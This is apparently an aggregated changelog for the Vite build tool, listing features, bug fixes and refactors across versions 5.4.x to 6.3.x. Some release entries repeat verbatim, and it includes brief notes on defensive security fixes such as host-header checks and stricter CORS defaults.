remove deprecated hook-level enforce/transform from transformIndexHtml hook (#19349) (6198b9d)
remove deprecated no-op type only properties (#19985) (9151c24)
remove no-op legacy.proxySsrExternalModules (#20013) (a37ac83)
ssr: remove ssrTransform line offset preservation (#19829) (61b6b96)
use hostValidationMiddleware (#20019) (83bf90e)
use mergeWithDefaults for experimental option (#20012) (98c5741)
use hook filters from rollup (#19755) (0d18fc1)

Tests

correct esbuild useDefineForClassFields test (#20143) (d90796e)
skip writing files in build hook filter test (#20076) (bf8b07d)

Continuous Integration

run tests on Node 24 as well (#20049) (1fe07d3)

Beta Changelogs

Bug Fixes

check static serve file inside sirv (#19965) (c22c43d)
optimizer: return plain object when using require to import externals in optimized dependencies (#19940) (efc5eab)

Code Refactoring

remove duplicate plugin context type (#19935) (d6d01c2)

`v6.3.3`

Compare Source

Bug Fixes

assets: ensure ?no-inline is not included in the asset url in the production environment (#19496) (16a73c0)
css: resolve relative imports in sass properly on Windows (#19920) (ffab442)
deps: update all non-major dependencies (#19899) (a4b500e)
ignore malformed uris in transform middleware (#19853) (e4d5201)
ssr: fix execution order of re-export (#19841) (ed29dee)
ssr: fix live binding of default export declaration and hoist exports getter (#19842) (80a91ff)

Performance Improvements

skip sourcemap generation for renderChunk hook of import-analysis-build plugin (#19921) (55cfd04)

Tests

ssr: test ssrTransform re-export deps and test stacktrace with first line (#19629) (9399cda)

`v6.3.2`

Compare Source

Features

css: improve lightningcss messages (#19880) (c713f79)

Bug Fixes

css: respect css.lightningcss option in css minification process (#19879) (b5055e0)
deps: update all non-major dependencies (#19698) (bab4cb9)
match default asserts case insensitive (#19852) (cbdab1d)
open first url if host does not match any urls (#19886) (6abbdce)

`v6.3.1`

Compare Source

Bug Fixes

avoid using Promise.allSettled in preload function (#19805) (35c7f35)
backward compat for internal plugin transform calls (#19878) (a152b7c)

`v6.3.0`

Compare Source

Features

env: add false option for envDir to disable env loading (#19503) (bca89e1)
types: make CustomPluginOptionsVite backward compatible (#19760) (821edf1)
config: improve bad character warning (#19683) (998303b)
css: support preprocessor with lightningcss (#19071) (d3450ca)
experimental: add fetchable environment interface (#19664) (c5b7191)
implement hook filters (#19602) (04d58b4)
types: expose CustomPluginOptionsVite type (#19557) (15abc01)
types: make ImportMetaEnv strictly available (#19077) (6cf5141)
types: type hints for hmr events (#19579) (95424b2)
warn if define['process.env'] contains path key with a value (#19517) (832b2c4)

Bug Fixes

hmr: avoid infinite loop happening with hot.invalidate in circular deps (#19870) (d4ee5e8)
preview: use host url to open browser (#19836) (5003434)
addWatchFile doesn't work if base is specified (fixes #19792) (#19794) (8bed1de)
correct the behavior when multiple transform filter options are specified (#19818) (7200dee)
css: remove empty chunk imports correctly when chunk file name contained special characters (#19814) (b125172)
dev: make query selector regexes more inclusive (fix #19213) (#19767) (f530a72)
fs check with svg and relative paths (#19782) (62d7e81)
hmr: run HMR handler sequentially (#19793) (380c10e)
keep entry asset files imported by other files (#19779) (2fa1495)
module-runner: allow already resolved id as entry (#19768) (e2e11b1)
reject requests with # in request-target (#19830) (175a839)
types: remove the keepProcessEnv from the DefaultEnvironmentOptions type (#19796) (36935b5)
unbundle fdir to fix commonjsOptions.dynamicRequireTargets (#19791) (71227be)
align plugin hook filter behavior with pluginutils (#19736) (0bbdd2c)
fs check in transform middleware (#19761) (5967313)
hmr: throw non-standard error info causes logical error (#19776) (6b648c7)
add back .mts to default resolve.extensions (#19701) (ae91bd0)
css: parse image-set without space after comma correctly (#19661) (d0d4c66)
css: scoped css order with non-scoped css (#19678) (a3a94ab)
deps: update all non-major dependencies (#19649) (f4e712f)
fs raw query with query separators (#19702) (262b5ec)
optimizer: fix incorrect picomatch usage in filter() (#19646) (300280d)
ssr: hoist export to handle cyclic import better (#18983) (8c04c69)

Performance Improvements

css: avoid constructing renderedModules (#19775) (59d0b35)
only bundle node version debug (#19715) (e435aae)

Documentation

vite: fix description of transformIndexHtml hook (#19799) (a0e1a04)

Miscellaneous Chores

remove unused eslint directive (#19781) (cb4f5b4)
fix some typos in comment (#19728) (35ee848)
deps: unbundle tinyglobby (#19487) (a5ea6f0)

Code Refactoring

simplify pluginFilter implementation (#19828) (0a0c50a)
[hookName].handler in plugins (#19586) (9827df2)
reporter: only call modulesReporter when logLevel is info (#19708) (7249553)

Tests

tweak generateCodeFrame test (#19812) (8fe3538)

Beta Changelogs

6.3.0-beta.2 (2025-04-11)

See 6.3.0-beta.2 changelog

6.3.0-beta.1 (2025-04-03)

See 6.3.0-beta.1 changelog

6.3.0-beta.0 (2025-03-26)

See 6.3.0-beta.0 changelog

`v6.2.7`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.2.6`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.2.5`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.2.4`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.2.3`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.2.2`

Compare Source

Features

env: add false option for envDir to disable env loading (#19503) (bca89e1)
types: make CustomPluginOptionsVite backward compatible (#19760) (821edf1)
config: improve bad character warning (#19683) (998303b)
css: support preprocessor with lightningcss (#19071) (d3450ca)
experimental: add fetchable environment interface (#19664) (c5b7191)
implement hook filters (#19602) (04d58b4)
types: expose CustomPluginOptionsVite type (#19557) (15abc01)
types: make ImportMetaEnv strictly available (#19077) (6cf5141)
types: type hints for hmr events (#19579) (95424b2)
warn if define['process.env'] contains path key with a value (#19517) (832b2c4)

Bug Fixes

hmr: avoid infinite loop happening with hot.invalidate in circular deps (#19870) (d4ee5e8)
preview: use host url to open browser (#19836) (5003434)
addWatchFile doesn't work if base is specified (fixes #19792) (#19794) (8bed1de)
correct the behavior when multiple transform filter options are specified (#19818) (7200dee)
css: remove empty chunk imports correctly when chunk file name contained special characters (#19814) (b125172)
dev: make query selector regexes more inclusive (fix #19213) (#19767) (f530a72)
fs check with svg and relative paths (#19782) (62d7e81)
hmr: run HMR handler sequentially (#19793) (380c10e)
keep entry asset files imported by other files (#19779) (2fa1495)
module-runner: allow already resolved id as entry (#19768) (e2e11b1)
reject requests with # in request-target (#19830) (175a839)
types: remove the keepProcessEnv from the DefaultEnvironmentOptions type (#19796) (36935b5)
unbundle fdir to fix commonjsOptions.dynamicRequireTargets (#19791) (71227be)
align plugin hook filter behavior with pluginutils (#19736) (0bbdd2c)
fs check in transform middleware (#19761) (5967313)
hmr: throw non-standard error info causes logical error (#19776) (6b648c7)
add back .mts to default resolve.extensions (#19701) (ae91bd0)
css: parse image-set without space after comma correctly (#19661) (d0d4c66)
css: scoped css order with non-scoped css (#19678) (a3a94ab)
deps: update all non-major dependencies (#19649) (f4e712f)
fs raw query with query separators (#19702) (262b5ec)
optimizer: fix incorrect picomatch usage in filter() (#19646) (300280d)
ssr: hoist export to handle cyclic import better (#18983) (8c04c69)

Performance Improvements

css: avoid constructing renderedModules (#19775) (59d0b35)
only bundle node version debug (#19715) (e435aae)

Documentation

vite: fix description of transformIndexHtml hook (#19799) (a0e1a04)

Miscellaneous Chores

remove unused eslint directive (#19781) (cb4f5b4)
fix some typos in comment (#19728) (35ee848)
deps: unbundle tinyglobby (#19487) (a5ea6f0)

Code Refactoring

simplify pluginFilter implementation (#19828) (0a0c50a)
[hookName].handler in plugins (#19586) (9827df2)
reporter: only call modulesReporter when logLevel is info (#19708) (7249553)

Tests

tweak generateCodeFrame test (#19812) (8fe3538)

Beta Changelogs

6.3.0-beta.2 (2025-04-11)

See 6.3.0-beta.2 changelog

6.3.0-beta.1 (2025-04-03)

See 6.3.0-beta.1 changelog

6.3.0-beta.0 (2025-03-26)

See 6.3.0-beta.0 changelog

`v6.2.1`

Compare Source

Features

add *?url&no-inline type and warning for .json?inline / .json?no-inline (#19566) (c0d3667)

Bug Fixes

css: stabilize css module hashes with lightningcss in dev mode (#19481) (92125b4)
deps: update all non-major dependencies (#19555) (f612e0f)
reporter: fix incorrect bundle size calculation with non-ASCII characters (#19561) (437c0ed)
sourcemap: combine sourcemaps with multiple sources without matched source (#18971) (e3f6ae1)
ssr: named export should overwrite export all (#19534) (2fd2fc1)

Performance Improvements

flush compile cache after 10s (#19537) (6c8a5a2)

Miscellaneous Chores

css: move environment destructuring after condition check (#19492) (c9eda23)
html: remove unnecessary value check (#19491) (797959f)

Code Refactoring

remove isBuild check from preAliasPlugin (#19587) (c9e086d)
restore endsWith usage (#19554) (6113a96)
use applyToEnvironment in internal plugins (#19588) (f678442)

Tests

add glob import test case (#19516) (aa1d807)
convert config playground to unit tests (#19568) (c0e68da)
convert resolve-config playground to unit tests (#19567) (db5fb48)

`v6.2.0`

Compare Source

Features

css: allow scoping css to importers exports (#19418) (3ebd838)
show mode on server start and add env debugger (#18808) (c575b82)
use host url to open browser (#19414) (f6926ca)

Bug Fixes

deps: update all non-major dependencies (#19501) (c94c9e0)
worker: string interpolation in dynamic worker options (#19476) (07091a1)
css: temporary add ?. after this.getModuleInfo in vite:css-post (#19478) (12b0b8a)

Miscellaneous Chores

use unicode cross icon instead of x (#19497) (5c70296)
bump esbuild to 0.25.0 (#19389) (73987f2)

Beta Changelogs

6.2.0-beta.1 (2025-02-21)

See 6.2.0-beta.1 changelog

6.2.0-beta.0 (2025-02-21)

See 6.2.0-beta.0 changelog

`v6.1.6`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.1.5`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.1.4`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.1.3`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.1.2`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.1.1`

Compare Source

Features

css: allow scoping css to importers exports (#19418) (3ebd838)
show mode on server start and add env debugger (#18808) (c575b82)
use host url to open browser (#19414) (f6926ca)

Bug Fixes

deps: update all non-major dependencies (#19501) (c94c9e0)
worker: string interpolation in dynamic worker options (#19476) (07091a1)
css: temporary add ?. after this.getModuleInfo in vite:css-post (#19478) (12b0b8a)

Miscellaneous Chores

use unicode cross icon instead of x (#19497) (5c70296)
bump esbuild to 0.25.0 (#19389) (73987f2)

Beta Changelogs

6.2.0-beta.1 (2025-02-21)

See 6.2.0-beta.1 changelog

6.2.0-beta.0 (2025-02-21)

See 6.2.0-beta.0 changelog

`v6.1.0`

Compare Source

Features

add support for injecting debug IDs (#18763) (0ff556a)

Bug Fixes

css: run rewrite plugin if postcss plugin exists (#19371) (bcdb51a)
deps: bump tsconfck (#19375) (746a583)
deps: update all non-major dependencies (#19392) (60456a5)
deps: update all non-major dependencies (#19440) (ccac73d)
ensure .[cm]?[tj]sx? static assets are JS mime (#19453) (e7ba55e)
html: ignore malformed src attrs (#19397) (aff7812)
ignore *.ipv4 address in cert (#19416) (973283b)
worker: fix web worker type detection (#19462) (edc65ea)

Miscellaneous Chores

update 6.1.0 changelog (#19363) (fa7c211)

Code Refactoring

remove custom .jxl mime (#19457) (0c85464)

`v6.0.15`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.0.14`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.0.13`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.0.12`

Compare Source

Please refer to CHANGELOG.md for details.

`v6.0.11`

Compare Source

Features

show hosts in cert in CLI (#19317) (a5e306f)
support for env var for defining allowed hosts (#19325) (4d88f6c)
use native runtime to import the config (#19178) (7c2a794)
print port in the logged error message after failed WS connection with EADDRINUSE (#19212) (14027b0)
add support for .jxl (#18855) (57b397c)
add the builtins environment resolve (#18584) (2c2d521)
call Logger for plugin logs in build (#13757) (bf3e410)
css: add friendly errors for IE hacks that are not supported by lightningcss (#19072) (caad985)
export defaultAllowedOrigins for user-land config and 3rd party plugins (#19259) (dc8946b)
expose createServerModuleRunnerTransport (#18730) (8c24ee4)
optimizer: support bun text lockfile (#18403) (05b005f)
reporter: add wasm to the compressible assets regex (#19085) (ce84142)
support async for proxy.bypass (#18940) (a6b9587)
support log related functions in dev (#18922) (3766004)
use module runner to import the config (#18637) (b7e0e42)
worker: support dynamic worker option fields (#19010) (d0c3523)

Bug Fixes

avoid builtStart during vite optimize (#19356) (fdb36e0)
build: fix stale build manifest on watch rebuild (#19361) (fcd5785)
allow expanding env vars in reverse order (#19352) (3f5f2bd)
avoid packageJson without name in resolveLibCssFilename (#19324) (f183bdf)
html: fix css disorder when building multiple entry html (#19143) (e7b4ba3)
css: less [@plugin](https://github.com/plugin) imports of JS files treated as CSS and rebased (fix #19268) (#19269) (602b373)
deps: update all non-major dependencies (#19296) (2bea7ce)
don't call buildStart hooks for vite optimize (#19347) (19ffad0)
don't call next middleware if user sent response in proxy.bypass (#19318) (7e6364d)
resolve: preserve hash/search of file url (#19300) (d1e1b24)
resolve: warn if node-like builtin was imported when resolve.builtin is empty (#19312) (b7aba0b)
respect top-level server.preTransformRequests (#19272) (12aaa58)
ssr: fix transform error due to export all id scope (#19331) (e28bce2)
ssr: pretty print plugin error in ssrLoadModule (#19290) (353c467)
use nodeLikeBuiltins for ssr.target: 'webworker' without noExternal: true (#19313) (9fc31b6)
change ResolvedConfig type to interface to allow extending it (#19210) (bc851e3)
correctly resolve hmr dep ids and fallback to url (#18840) (b84498b)
deps: update all non-major dependencies (#19190) (f2c07db)
hmr: register inlined assets as a dependency of CSS file (#18979) (eb22a74)
make --force work for all environments (#18901) (51a42c6)
resolve: support resolving TS files by JS extension specifiers in JS files (#18889) (612332b)
ssr: combine empty source mappings (#19226) (ba03da2)
use loc.file from rollup errors if available (#19222) (ce3fe23)
utils: clone RegExp values with new RegExp instead of structuredClone (fix #19245, fix #18875) (#19247) (56ad2be)

Performance Improvements

css: only run postcss when needed (#19061) (30194fa)

Documentation

rephrase browser range and features relation (#19286) (97569ef)
update build.manifest jsdocs (#19332) (4583781)

Code Refactoring

deprecate vite optimize command (#19348) (6e0e3c0)

Miscellaneous Chores

update deprecate links domain (#19353) (2b2299c)
deps: update dependency strip-literal to v3 (#19231) (1172d65)
remove outdated code comment about scanImports not being used in ssr (#19285) (fbbc6da)
unneeded name in lockfileFormats (#19275) (96092cb)

Beta Changelogs

6.1.0-beta.2 (2025-02-04)

See 6.1.0-beta.2 changelog

6.1.0-beta.1 (2025-02-04)

See 6.1.0-beta.1 changelog

6.1.0-beta.0 (2025-01-24)

See 6.1.0-beta.0 changelog

`v6.0.10`

Compare Source

Bug Fixes

try parse server.origin URL (#19241) (2495022)

`v6.0.9`

Compare Source

⚠ BREAKING CHANGES

check host header to prevent DNS rebinding attacks and introduce server.allowedHosts (bd896fb)
default server.cors: false to disallow fetching from untrusted origins (b09572a)

Bug Fixes

check host header to prevent DNS rebinding attacks and introduce server.allowedHosts (bd896fb)
default server.cors: false to disallow fetching from untrusted origins (b09572a)
verify token for HMR WebSocket connection (029dcd6)

`v6.0.8`

Compare Source

Bug Fixes

avoid SSR HMR for HTML files (#19193) (3bd55bc)
build time display 7m 60s (#19108) (cf0d2c8)
deps: update all non-major dependencies (#19098) (8639538)
don't resolve URL starting with double slash (#19059) (35942cd)
ensure server.close() only called once (#19204) (db81c2d)
optimizer: use correct default install state path for yarn PnP (#19119) (e690d8b)
resolve.conditions in ResolvedConfig was defaultServerConditions (#19174) (ad75c56)
tree shake stringified JSON imports (#19189) (f2aed62)
types: improve ESBuildOptions.include / exclude type to allow readonly (string | RegExp)[] (#19146) (ea53e70)
use shared sigterm callback (#19203) (47039f4)

Miscellaneous Chores

deps: update dependency pathe to v2 (#19139) (71506f0)

`v6.0.7`

Compare Source

Features

css: show lightningcss warnings (#19076) (b07c036)

Bug Fixes

fix minify when builder.sharedPlugins: true (#19025) (f7b1964)
html: error while removing vite-ignore attribute for inline script (#19062) (a492253)
skip the plugin if it has been called before with the same id and importer (#19016) (b178c90)
ssr: fix semicolon injection by ssr transform (#19097) (1c102d5)

Performance Improvements

skip globbing for static path in warmup (#19107) (677508b)

`v6.0.6`

Compare Source

Bug Fixes

css: resolve style tags in HTML files correctly for lightningcss (#19001) (afff05c)
css: show correct error when unknown placeholder is used for CSS modules pattern in lightningcss (#19070) (9290d85)
replace runner-side path normalization with fetchModule-side resolve (#18361) (9f10261)
resolve: handle package.json with UTF-8 BOM (#19000) (902567a)
ssrTransform: preserve line offset when transforming imports (#19004) (1aa434e)

Reverts

unpin esbuild version (#19043) (8bfe247)

Miscellaneous Chores

fix typo in comment (#19067) (eb06ec3)
update comment about build.target (#19047) (0e9e81f)

Tests

ssr: test virtual module with query (#19044) (a1f4b46)

`v6.0.5`

Compare Source

Bug Fixes

esbuild regression (pin to 0.24.0) (#19027) (4359e0d)

`v6.0.4`

Compare Source

Bug Fixes

this.resolve skipSelf should not skip for different id or import (#18903) (4727320)
css: escape double quotes in url() when lightningcss is used (#18997) (3734f80)
css: root relative import in sass modern API on Windows (#18945) (c4b532c)
css: skip non css in custom sass importer (#18970) (21680bd)
deps: update all non-major dependencies (#18967) (d88d000)
deps: update all non-major dependencies (#18996) (2b4f115)
fallback terser to main thread when function options are used (#18987) (12b612d)
merge client and ssr values for pluginContainer.getModuleInfo (#18895) (258cdd6)
optimizer: keep NODE_ENV as-is when keepProcessEnv is true (#18899) (8a6bb4e)
ssr: recreate ssrCompatModuleRunner on restart (#18973) (7d6dd5d)

Miscellaneous Chores

better validation error message for dts build (#18948) (63b82f1)
deps: update all non-major dependencies (#18916) (ef7a6a3)
deps: update dependency @rollup/plugin-node-resolve to v16 (#18968) (62fad6d)

Code Refactoring

make internal invoke event to use the same interface with handleInvoke (#18902) (27f691b)
simplify manifest plugin code (#18890) (1bfe21b)

Tests

test ModuleRunnerTransport invoke API (#18865) (e5f5301)
test output hash changes (#18898) (bfbb130)

`v6.0.3`

Compare Source

Bug Fixes

config: bundle files referenced with imports field (#18887) (2b5926a)
config: make stacktrace path correct when sourcemap is enabled (#18833) (20fdf21)
css: rewrite url when image-set and url exist at the same time (#18868) (d59efd8)
deps: update all non-major dependencies (#18853) (5c02236)
handle postcss load unhandled rejections (#18886) (d5fb653)
html: allow unexpected question mark in tag name (#18852) (1b54e50)
make handleInvoke interface compatible with invoke (#18876) (a1dd396)
make result interfaces for ModuleRunnerTransport[#invoke](https://github.com/vitejs/vite/issues/invoke) more explicit (#18851) (a75fc31)
merge environments.ssr.resolve with root ssr config (#18857) (3104331)
module-runner: decode uri for file url passed to import (#18837) (88e49aa)
no permission to create vite config file (#18844) (ff47778)
remove CSS import in CJS correctly in some cases (#18885) (690a36f)

Miscellaneous Chores

fix duplicate attributes issue number in comment (#18860) (ffee618)

Code Refactoring

fix logic errors found by no-unnecessary-condition rule (#18891) (ea802f8)

`v6.0.2`

Compare Source

Features

css: format lightningcss error (#18818) (dac7992)

Bug Fixes

css: referencing aliased svg asset with lightningcss enabled errored (#18819) (ae68958)
don't store temporary vite config file in node_modules if deno (#18823) (a20267b)
manifest: use style.css as a key for the style file for cssCodesplit: false (#18820) (ec51115)
optimizer: resolve all promises when cancelled (#18826) (d6e6194)
resolve: don't set builtinModules to external by default (#18821) (2250ffa)
ssr: set ssr.target: 'webworker' defaults as fallback (#18827) (b39e696)

Miscellaneous Chores

run typecheck in unit tests (#18858) (49f20bb)
update broken links in changelog (#18802) (cb754f8)
update broken links in changelog (#18804) (47ec49f)

Code Refactoring

make properties of ResolvedServerOptions and ResolvedPreviewOptions required (#18796) (51a5569)

`v6.0.1`

Compare Source

Features

show hosts in cert in CLI (#19317) (a5e306f)
support for env var for defining allowed hosts (#19325) (4d88f6c)
use native runtime to import the config (#19178) (7c2a794)
print port in the logged error message after failed WS connection with EADDRINUSE (#19212) (14027b0)
add support for .jxl (#18855) (57b397c)
add the builtins environment resolve (#18584) (2c2d521)
call Logger for plugin logs in build (#13757) (bf3e410)
css: add friendly errors for IE hacks that are not supported by lightningcss (#19072) (caad985)
export defaultAllowedOrigins for user-land config and 3rd party plugins (#19259) (dc8946b)
expose createServerModuleRunnerTransport (#18730) (8c24ee4)
optimizer: support bun text lockfile (#18403) (05b005f)
reporter: add wasm to the compressible assets regex (#19085) (ce84142)
support async for proxy.bypass (#18940) (a6b9587)
support log related functions in dev (#18922) (3766004)
use module runner to import the config (#18637) (b7e0e42)
worker: support dynamic worker option fields (#19010) (d0c3523)

Bug Fixes

avoid builtStart during vite optimize (#19356) (fdb36e0)
build: fix stale build manifest on watch rebuild (#19361) (fcd5785)
allow expanding env vars in reverse order (#19352) (3f5f2bd)
avoid packageJson without name in resolveLibCssFilename (#19324) (f183bdf)
html: fix css disorder when building multiple entry html (#19143) (e7b4ba3)
css: less [@plugin](https://github.com/plugin) imports of JS files treated as CSS and rebased (fix #19268) (#19269) (602b373)
deps: update all non-major dependencies (#19296) (2bea7ce)
don't call buildStart hooks for vite optimize (#19347) (19ffad0)
don't call next middleware if user sent response in proxy.bypass (#19318) (7e6364d)
resolve: preserve hash/search of file url (#19300) (d1e1b24)
resolve: warn if node-like builtin was imported when resolve.builtin is empty (#19312) (b7aba0b)
respect top-level server.preTransformRequests (#19272) (12aaa58)
ssr: fix transform error due to export all id scope (#19331) (e28bce2)
ssr: pretty print plugin error in ssrLoadModule (#19290) (353c467)
use nodeLikeBuiltins for ssr.target: 'webworker' without noExternal: true (#19313) (9fc31b6)
change ResolvedConfig type to interface to allow extending it (#19210) (bc851e3)
correctly resolve hmr dep ids and fallback to url (#18840) (b84498b)
deps: update all non-major dependencies (#19190) (f2c07db)
hmr: register inlined assets as a dependency of CSS file (#18979) (eb22a74)
make --force work for all environments (#18901) (51a42c6)
resolve: support resolving TS files by JS extension specifiers in JS files (#18889) (612332b)
ssr: combine empty source mappings (#19226) (ba03da2)
use loc.file from rollup errors if available (#19222) (ce3fe23)
utils: clone RegExp values with new RegExp instead of structuredClone (fix #19245, fix #18875) (#19247) (56ad2be)

Performance Improvements

css: only run postcss when needed (#19061) (30194fa)

Documentation

rephrase browser range and features relation (#19286) (97569ef)
update build.manifest jsdocs (#19332) (4583781)

Code Refactoring

deprecate vite optimize command (#19348) (6e0e3c0)

Miscellaneous Chores

update deprecate links domain (#19353) (2b2299c)
deps: update dependency strip-literal to v3 (#19231) (1172d65)
remove outdated code comment about scanImports not being used in ssr (#19285) (fbbc6da)
unneeded name in lockfileFormats (#19275) (96092cb)

Beta Changelogs

6.1.0-beta.2 (2025-02-04)

See 6.1.0-beta.2 changelog

6.1.0-beta.1 (2025-02-04)

See 6.1.0-beta.1 changelog

6.1.0-beta.0 (2025-01-24)

See 6.1.0-beta.0 changelog

`v6.0.0`

Compare Source

Features

show hosts in cert in CLI (#19317) (a5e306f)
support for env var for defining allowed hosts (#19325) (4d88f6c)
use native runtime to import the config (#19178) (7c2a794)
print port in the logged error message after failed WS connection with EADDRINUSE (#19212) (14027b0)
add support for .jxl (#18855) (57b397c)
add the builtins environment resolve (#18584) (2c2d521)
call Logger for plugin logs in build (#13757) (bf3e410)
css: add friendly errors for IE hacks that are not supported by lightningcss (#19072) (caad985)
export defaultAllowedOrigins for user-land config and 3rd party plugins (#19259) (dc8946b)
expose createServerModuleRunnerTransport (#18730) (8c24ee4)
optimizer: support bun text lockfile (#18403) (05b005f)
reporter: add wasm to the compressible assets regex (#19085) (ce84142)
support async for proxy.bypass (#18940) (a6b9587)
support log related functions in dev (#18922) (3766004)
use module runner to import the config (#18637) (b7e0e42)
worker: support dynamic worker option fields (#19010) (d0c3523)

Bug Fixes

avoid builtStart during vite optimize (#19356) (fdb36e0)
build: fix stale build manifest on watch rebuild (#19361) (fcd5785)
allow expanding env vars in reverse order (#19352) (3f5f2bd)
avoid packageJson without name in resolveLibCssFilename (#19324) (f183bdf)
html: fix css disorder when building multiple entry html (#19143) (e7b4ba3)
css: less [@plugin](https://github.com/plugin) imports of JS files treated as CSS and rebased (fix #19268) (#19269) (602b373)
deps: update all non-major dependencies (#19296) (2bea7ce)
don't call buildStart hooks for vite optimize (#19347) (19ffad0)
don't call next middleware if user sent response in proxy.bypass (#19318) (7e6364d)
resolve: preserve hash/search of file url (#19300) (d1e1b24)
resolve: warn if node-like builtin was imported when resolve.builtin is empty (#19312) (b7aba0b)
respect top-level server.preTransformRequests (#19272) (12aaa58)
ssr: fix transform error due to export all id scope (#19331) (e28bce2)
ssr: pretty print plugin error in ssrLoadModule (#19290) (353c467)
use nodeLikeBuiltins for ssr.target: 'webworker' without noExternal: true (#19313) (9fc31b6)
change ResolvedConfig type to interface to allow extending it (#19210) (bc851e3)
correctly resolve hmr dep ids and fallback to url (#18840) (b84498b)
deps: update all non-major dependencies (#19190) (f2c07db)
hmr: register inlined assets as a dependency of CSS file (#18979) (eb22a74)
make --force work for all environments (#18901) (51a42c6)
resolve: support resolving TS files by JS extension specifiers in JS files (#18889) (612332b)
ssr: combine empty source mappings (#19226) (ba03da2)
use loc.file from rollup errors if available (#19222) (ce3fe23)
utils: clone RegExp values with new RegExp instead of structuredClone (fix #19245, fix #18875) (#19247) (56ad2be)

Performance Improvements

css: only run postcss when needed (#19061) (30194fa)

Documentation

rephrase browser range and features relation (#19286) (97569ef)
update build.manifest jsdocs (#19332) (4583781)

Code Refactoring

deprecate vite optimize command (#19348) (6e0e3c0)

Miscellaneous Chores

update deprecate links domain (#19353) (2b2299c)
deps: update dependency strip-literal to v3 (#19231) (1172d65)
remove outdated code comment about scanImports not being used in ssr (#19285) (fbbc6da)
unneeded name in lockfileFormats (#19275) (96092cb)

Beta Changelogs

6.1.0-beta.2 (2025-02-04)

See 6.1.0-beta.2 changelog

6.1.0-beta.1 (2025-02-04)

See 6.1.0-beta.1 changelog

6.1.0-beta.0 (2025-01-24)

See 6.1.0-beta.0 changelog

`v5.4.21`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.20`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.19`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.18`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.17`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.16`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.15`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.14`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.13`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.4.12`

Compare Source

This version contains a breaking change due to security fixes. See https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6 for more details.

Please refer to CHANGELOG.md for details.

`v5.4.11`

Compare Source

Today, we're taking another big step in Vite's story. The Vite team, contributors, and ecosystem partners are excited to announce the release of the next Vite major:

Vite 6.0 announcement blog post
Docs
Translations: 简体中文, 日本語, Español, Português, 한국어, Deutsch
Migration Guide

We want to thank the more than 1K contributors to Vite Core and the maintainers and contributors of Vite plugins, integrations, tools, and translations that have helped us craft this new major. We invite you to get involved and help us improve Vite for the whole ecosystem. Learn more at our Contributing Guide.

⚠ BREAKING CHANGES

drop node 21 support in version ranges (#18729) (a384d8f)
deps: update dependency dotenv-expand to v12 (#18697) (0c658de)
resolve: allow removing conditions (#18395) (d002e7d)
html: support more asset sources (#11138) (8a7af50)
remove fs.cachedChecks option (#18493) (94b0857)
proxy bypass with WebSocket (#18070) (3c9836d)
css: remove default import in ssr dev (#17922) (eccf663)
lib: use package name for css output file name (#18488) (61cbf6f)
update to chokidar v4 (#18453) (192d555)
support file:// resolution (#18422) (6a7e313)
deps: update postcss-load-config to v6 (#15235) (3a27f62)
css: change default sass api to modern/modern-compiler (#17937) (d4e0442)
css: load postcss config within workspace root only (#18440) (d23a493)
default build.cssMinify to 'esbuild' for SSR (#15637) (f1d3bf7)
json: add json.stringify: 'auto' and make that the default (#18303) (b80daa7)
bump minimal terser version to 5.16.0 (#18209) (19ce525)
deps: migrate fast-glob to tinyglobby (#18243) (6f74a3a)

Features

add support for .cur type (#18680) (5ec9eed)
drop node 21 support in version ranges (#18729) (a384d8f)
enable HMR by default on ModuleRunner side (#18749) (4d2abc7)
support module-sync condition when loading config if enabled (#18650) (cf5028d)
add isSsrTargetWebWorker flag to configEnvironment hook (#18620) (3f5fab0)
add ssr.resolve.mainFields option (#18646) (a6f5f5b)
expose default mainFields/conditions (#18648) (c12c653)
extended applyToEnvironment and perEnvironmentPlugin (#18544) (8fa70cd)
optimizer: allow users to specify their esbuild platform option (#18611) (0924879)
show error when accessing variables not exposed in CJS build (#18649) (87c5502)
asset: add ?inline and ?no-inline queries to control inlining (#15454) (9162172)
asset: inline svg in dev if within limit (#18581) (f08b146)
use a single transport for fetchModule and HMR support (#18362) (78dc490)
html: support more asset sources (#11138) (8a7af50)
resolve: allow removing conditions (#18395) (d002e7d)
html: support vite-ignore attribute to opt-out of processing (#18494) (d951310)
lib: use package name for css output file name (#18488) (61cbf6f)
log complete config in debug mode (#18289) (04f6736)
proxy bypass with WebSocket (#18070) (3c9836d)
support file:// resolution (#18422) (6a7e313)
update to chokidar v4 (#18453) (192d555)
allow custom console in createLogger (#18379) (0c497d9)
css: add more stricter typing of lightningcss (#18460) (b9b925e)
css: change default sass api to modern/modern-compiler (#17937) (d4e0442)
read sec-fetch-dest header to detect JS in transform (#9981) (e51dc40)
css: load postcss config within workspace root only (#18440) (d23a493)
json: add json.stringify: 'auto' and make that the default (#18303) (b80daa7)
add .git to deny list by default (#18382) (105ca12)
add environment::listen (#18263) (4d5f51d)
enable dependencies discovery and pre-bundling in ssr environments (#18358) (9b21f69)
restrict characters useable for environment name (#18255) (9ab6180)
support arbitrary module namespace identifier imports from cjs deps (#18236) (4389a91)
introduce RunnableDevEnvironment (#18190) (fb292f2)
support this.environment in options and onLog hook (#18142) (7722c06)
css: support es2023 build target for lightningcss (#17998) (1a76300)
Environment API (#16471) (242f550)
expose EnvironmentOptions type (#18080) (35cf59c)

Bug Fixes

createRunnableDevEnvironment returns RunnableDevEnvironment, not DevEnvironment (#18673) (74221c3)
